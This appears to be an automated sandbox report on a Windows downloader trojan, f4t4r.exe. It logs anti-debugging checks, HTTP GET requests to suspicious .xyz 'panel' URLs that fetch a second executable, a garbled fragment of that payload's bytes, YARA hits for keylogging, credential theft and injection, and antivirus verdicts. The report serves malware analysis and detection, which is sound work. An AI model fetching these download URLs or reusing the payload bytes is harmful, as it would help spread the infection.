f4t4r.exe

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent March 10, 2021, 3:47 p.m.			0	0

This executable has a PDB path (1 event)

pdb_path

D:\scm\Italy\dopplegang\DarkCrypter\Bin\SimpleDownloader.pdb

One or more processes crashed (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ March 10, 2021, 3:47 p.m.	stacktrace: RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 exception.symbol: f4t4r+0xa78ec2 exception.instruction: add byte ptr [eax], al exception.module: f4t4r.exe exception.exception_code: 0xc0000005 exception.offset: 10981058 exception.address: 0x1918ec2 registers.esp: 3013892 registers.edi: 0 registers.eax: 1970484152 registers.ebp: 3013900 registers.edx: 26316482 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0	1	0	0

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

GET method with no useragent header

suspicious_request

GET http://wifoweijijfoiwjweoi.xyz/panel/upload/data.cmp

Performs some HTTP requests (1 event)

request

GET http://wifoweijijfoiwjweoi.xyz/panel/upload/data.cmp

An executable file was downloaded by the process f4t4r.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
InternetReadFile March 10, 2021, 3:47 p.m.	buffer: MZÿÿ¸@øº´ Í!¸ LÍ!This program cannot be run in DOS mode. $(Aîül €¯l €¯l €¯rr ¯O €¯Kæû¯~ €¯¯/߯m €¯¯/¯o €¯l €¯h €¯JäK¯o €¯l ¯Ÿ €¯rr¯m €¯rr¯, €¯rr¯m €¯Richl €¯PEL iF`à  °8 ¥oÀ@ @ÚÜ@ÄÀÈ.textЮ° `.rdata¼,À.´@@.datap4ðDâ@À.CRT0&@@.relocˆÑ@Ò(@BVW‹ø¾ 3ÀëI–úþÿ ÒtŠ„ÒtˆAGƒî uçI_¸z€Æ ^à öuI_¸z€Æ ^Ã_ˆ ^ÃÌÌÌÌÌÌU‹ìƒì(S‹]VWSjhÿ¨ÀB‹ð öt;EìPMäQUÜREôPVÿÜÁB‹øÿ ÀBVÿpÀB ÿtuô‹Ãè!_^[‹å]Ã_^3À[‹å]ÃÌÌÌÌÌÌÌÌÌÌÌÌh°KÿäÁB Àu+¡´KPÿ4ÂB Àuÿ ÀB‹ ´KPQhŒ¨GèI”ƒÄ¡°KÃU‹ìì¨Wh jV臣ƒÈÿ+E}ÜPèJ‹‰Mì‹P‰Uð‹H‰Mô‹Pj| `ÿÿÿjP‰UøÇ \ÿÿÿèG£ƒÄj@\ÿÿÿQUìRÿ¼ÃBjjh Vjÿ \ÿÿÿPjhéýÿØÁB‹Æ_‹å]ÃÌÌÌÌÌÌÌÌÌÌÌÌU‹ìƒäøì VWj t$èGÿÿÿ‹=\ÂBƒÄPh×ChKÿ×jè*ÿÿÿƒÄPh×ChøKÿ×jèÿÿÿƒÄPh×Ch(Kÿ×_^‹å]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ì‹ ¨K‹A<ƒìV‹5¤ÀBWÁ·HUüRjD h¸KPÿ֋=ÂBPÿ× Àuÿ ÀBPhĨGè㒃Ä_3À^‹å]Ë ¬K Ét"‹A<Á·HUøRjD h¸KPÿÖPÿ× Àt¸_¸ ^‹å]ÃÌU‹ìƒäøì SVW‹=TÁBh=Ãjÿ׋PÁBPÿӋð öuIj2ÿ¸ÀBh=Ãjÿ×PÿӋð ötæh=ÃhÈFVèn¡hÌFD$ 舙Vh=Ë֋Èèٙ‹EƒÄ_Ç=ËÆ^[‹å]ÃÌÌÌÌU‹ìQSWEü3ÿP‰}üè\ÿÿÿ‹ØƒÄ;ßtYVSè4§‹ðƒÄƒþÿt7蝑‹ø ÿt,‹MüVWQS蓦ƒÄ;ÆtWjÿTÁBPÿXÁB3ÿë‹U‰SjÿTÁBPÿXÁB^‹Ç_[‹å]ÃÌÌU‹ìƒäøì SVW‹=TÁBhCÜjÿ׋PÁBPÿӋð öuIj2ÿ¸ÀBhCÜjÿ×PÿӋð ötæhCÜh request_handle: 0x00cc000c	1	1	0

Potentially malicious URLs were found in the process memory dump (50 out of 932 events)

url	https://ssl.pstatic.net/tveta/libs/1287/1287046/6df1cc02334922baa2d4_20200806172035021.jpg
url	https://ssl.pstatic.net/static/pwe/common/img_use_mobile_version.png
url	http://ddkiigedliji.xyz/panel/upload/data.cmp
url	https://fonts.gstatic.com/s/lato/v16/S6uyw4BMUTPHjx4wWA.woff
url	http://google.com/
url	https://s.pstatic.net/dthumb.phinf/?src=%22http%3A%2F%2Fstatic.naver.net%2Fwww%2Fmobile%2Fedit%2F2020%2F0805%2FcropImg_339x222_38528621599152653.jpeg%22
url	http://option
url	https://s.pstatic.net/static/www/mobile/edit/2020/0804/cropImg_728x360_38481254551659019.jpeg
url	https://ssl.pstatic.net/tveta/libs/assets/js/common/min/probe.min.js
url	https://s.pstatic.net/dthumb.phinf/?src=%22http%3A%2F%2Fstatic1.naver.net%2Fwww%2Fmobile%2Fedit%2F2020%2F0806%2FcropImg_222x145_38626953912837677.png%22
url	https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
url	http://search.naver.com/search.naver?sm=tab_hty.top
url	http://www.snee.com/xml/xslt/sample.doc
url	https://ssl.pstatic.net/static/pwe/nm/bg_container_dh_white_150915.png
url	https://s.pstatic.net/static/www/mobile/edit/2018/0206/cropImg_166x108_118371466370743504.jpeg
url	https://s.pstatic.net/static/newsstand/up/2020/0615/nsd10319824.png
url	https://fonts.gstatic.com/s/catamaran/v7/o-0bIpQoyXQa2RxT7-5B6Ryxs2E_6n1iPHjd5a7dvQ.woff
url	https://s.pstatic.net/dthumb.phinf/?src=%22http%3A%2F%2Fstatic.naver.net%2Fwww%2Fmobile%2Fedit%2F2020%2F0805%2FcropImg_339x222_38552809772500435.jpeg%22
url	https://t1.daumcdn.net/tistory_admin/blogs/plugins/tatterDesk/js/src/controls.js?_version_=9024c9023ed6ab26b00b4f2905e46ffa08aeb336
url	http://cript
url	https://ssl.pstatic.net/static/pwe/nm/b.gif
url	https://castbox.shopping.naver.com/js/lazyload.js
url	https://s.pstatic.net/shopping.phinf/20200729_1/2931dd60-1842-4048-a39c-1e3389db4a0e.jpg
url	https://ssl.pstatic.net/static/pwe/nm/spr_vertical_0d25bb77f8.png
url	https://s.pstatic.net/dthumb.phinf/?src=%22http%3A%2F%2Fstatic.naver.net%2Fwww%2Fmobile%2Fedit%2F2020%2F0805%2Fmobile_17061525298c.jpg%22
url	https://s.pstatic.net/static/newsstand/2020/logo/light/0604/042.png
url	https://s.pstatic.net/static/newsstand/2020/logo/light/0604/955.png
url	https://s.pstatic.net/static/newsstand/2020/logo/light/0604/056.png
url	http://www.buzzadnetwork.com/jump/next.php?stamat=m%7CM-4iM-4jaQdHQBH0dEdHP3xP.0e7%2CboDB7XrVJDfRqYwVNhmAc8QRCrIuseXl_bWuTf_latOFYiGEzPpb7ikp5t8RPmTHyMRYDe1i9EJZLC6LSuccW1-YPggnMxkcwVirdNVGfgK3hFUbeKvFvqNv0-u8VxfrNUFB1gFhMN_8GLCn1znxf5_p0FJe0MYRI7nbfyajoqg_H3fvzrjsMsC0vAMYn2un8v5vcBfzwM-DewoZ7WId7geGlrySfAHx5KiJ5Hm90CU%2C
url	https://s.pstatic.net/shopping.phinf/20200720_22/e2297359-375a-403a-86c5-44ff86c708fc.jpg
url	https://t1.daumcdn.net/tistory_admin/blogs/plugins/PreventCopyContents/js/functions.js?_version_=9024c9023ed6ab26b00b4f2905e46ffa08aeb336
url	http://www.language
url	https://ssl.pstatic.net/tveta/libs/1298/1298853/743c01d46e807a376d99_20200730182507675.png
url	https://tistory3.daumcdn.net/tistory/807805/skin/images/footerbg.jpg
url	https://s.pstatic.net/static/newsstand/2020/logo/light/0604/820.png
url	https://file-examples-com.github.io/uploads/2017/02/file-sample_1MB.doc
url	https://s.pstatic.net/static/newsstand/2020/logo/light/0604/825.png
url	https://s.pstatic.net/static/newsstand/2020/logo/light/0604/327.png
url	https://fonts.gstatic.com/s/catamaran/v7/o-0bIpQoyXQa2RxT7-5B6Ryxs2E_6n1iPHjc5a7dvQ.woff
url	http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
url	https://mail.naver.com/js_src/com/nhncorp/mail/write/se2_new/smart_editor2_inputarea_ie8.html?version=20190704
url	https://s.pstatic.net/static/newsstand/2020/logo/light/0604/293.png
url	https://static.nid.naver.com/loginv3/img/sp_login_20150113.gif
url	https://s.pstatic.net/static/newsstand/2020/logo/light/0604/031.png
url	https://tpc.googlesyndication.com/pagead/images/abg/icon.png
url	https://search.pstatic.net/common/?src=http%3A%2F%2Fcafefiles.naver.net%2FMjAxNzExMDdfODcg%2FMDAxNTEwMDY0OTYzNTA5.y-bJj3BgRC8r80hM6EblWFHSqawqo5-vMJAzHBN6rEkg.vAPtUzoeY8mHPRaMuejD3HrMtW5xgv-cdeEaAc0q2Rog.PNG.flashcs7%2FScreenshot_2017-11-07-22-55-08.png%23600x1024
url	https://www.gstatic.com/m/images/sy_stars_9.gif
url	https://t1.daumcdn.net/tistory_admin/blogs/plugins/tatterDesk/js/src/dragdrop.js?_version_=9024c9023ed6ab26b00b4f2905e46ffa08aeb336
url	https://phinf.pstatic.net/contact/20190113_166/1547312816315t3o9l_JPEG/image.JPEG?type=s80
url	https://www.naver.com

Yara rule detected in process memory (50 out of 89 events)

description	Code injection with CreateRemoteThread in a remote process				rule	inject_thread
description	Hijack network configuration				rule	hijack_network
description	Create a windows service				rule	create_service
description	Create a COM server				rule	create_com_service
description	Communications over UDP network				rule	network_udp_sock
description	Listen for incoming communication				rule	network_tcp_listen
description	Communications over Toredo network				rule	network_toredo
description	Communications over P2P network				rule	network_p2p_win
description	Communications over HTTP				rule	network_http
description	File downloader/dropper				rule	network_dropper
description	Communications over FTP				rule	network_ftp
description	Communications over RAW socket				rule	network_tcp_socket
description	Communications use DNS				rule	network_dns
description	Communication using dga				rule	network_dga
description	Escalade priviledges				rule	escalate_priv
description	Take screenshot				rule	screenshot
description	Run a keylogger				rule	keylogger
description	Steal credential				rule	cred_local
description	Record Audio				rule	sniff_audio
description	APC queue tasks migration				rule	migrate_apc
description	Malware can spread east-west file				rule	spreading_file
description	Malware can spread east-west using share drive				rule	spreading_share
description	Create or check mutex				rule	win_mutex
description	Affect system registries				rule	win_registry
description	Affect system token				rule	win_token
description	Affect private profile				rule	win_private_profile
description	Affect private profile				rule	win_files_operation
description	Match Winsock 2 API library declaration				rule	Str_Win32_Winsock2_Library
description	Match Windows Inet API library declaration				rule	Str_Win32_Wininet_Library
description	Match Windows Inet API call				rule	Str_Win32_Internet_API
description	Match Windows Http API call				rule	Str_Win32_Http_API
description	(no description)				rule	DebuggerCheck__GlobalFlags
description	(no description)				rule	DebuggerCheck__QueryInfo
description	(no description)				rule	DebuggerCheck__RemoteAPI
description	(no description)				rule	DebuggerHiding__Thread
description	(no description)				rule	DebuggerHiding__Active
description	(no description)				rule	DebuggerException__ConsoleCtrl
description	(no description)				rule	DebuggerException__SetConsoleCtrl
description	(no description)				rule	ThreadControl__Context
description	(no description)				rule	SEH__vectored
description	(no description)				rule	Check_Dlls
description	Checks if being debugged				rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert				rule	antisb_threatExpert
description	Bypass DEP				rule	disable_dep
description	Affect hook table				rule	win_hook
description	Code injection with CreateRemoteThread in a remote process				rule	inject_thread
description	Hijack network configuration				rule	hijack_network
description	Create a windows service				rule	create_service
description	Create a COM server				rule	create_com_service
description	Communications over UDP network				rule	network_udp_sock

Connects to an IRC server, possibly part of a botnet

Generates some ICMP traffic

File has been identified by 36 AntiVirus engines on VirusTotal as malicious (36 events)

Bkav	W32.AIDetect.malware2
Elastic	malicious (high confidence)
MicroWorld-eScan	Gen:Variant.Johnnie.312242
FireEye	Generic.mg.d7634d1df27b569a
ALYac	Gen:Variant.Johnnie.312242
Cybereason	malicious.df27b5
Arcabit	Trojan.Johnnie.D4C3B2
Symantec	ML.Attribute.HighConfidence
APEX	Malicious
Kaspersky	UDS:DangerousObject.Multi.Generic
BitDefender	Gen:Variant.Johnnie.312242
Avast	FileRepMalware
Ad-Aware	Gen:Variant.Johnnie.312242
Emsisoft	Gen:Variant.Johnnie.312242 (B)
DrWeb	Trojan.Siggen12.32355
McAfee-GW-Edition	Artemis!Trojan
ESET-NOD32	a variant of Generik.CTFQJC
Avira	TR/AD.APTKitsune.wfhbz
Gridinsoft	Trojan.Win32.Agent.vb
Microsoft	Trojan:Win32/Woreflint.A!cl
AegisLab	Trojan.Win32.Johnnie.4!c
ZoneAlarm	HEUR:Backdoor.Win32.Konus.gen
GData	Gen:Variant.Johnnie.312242
Cynet	Malicious (score: 100)
AhnLab-V3	Malware/Gen.Generic.C4343279
McAfee	Artemis!D7634D1DF27B
MAX	malware (ai score=86)
VBA32	suspected of Trojan.Downloader.gen.h
Malwarebytes	Generic.Malware/Suspicious
TrendMicro-HouseCall	TROJ_GEN.R002H09C921
Rising	Malware.Heuristic!ET#83% (RDMK:cmRtazoNzm9aR7k3SCw0aai8276E)
SentinelOne	Static AI - Suspicious PE
Fortinet	W32/PossibleThreat
BitDefenderTheta	Gen:NN.ZexaF.34608.huW@aGOIQnbi
AVG	FileRepMalware
Qihoo-360	Win32/Trojan.Generic.HgIASQcA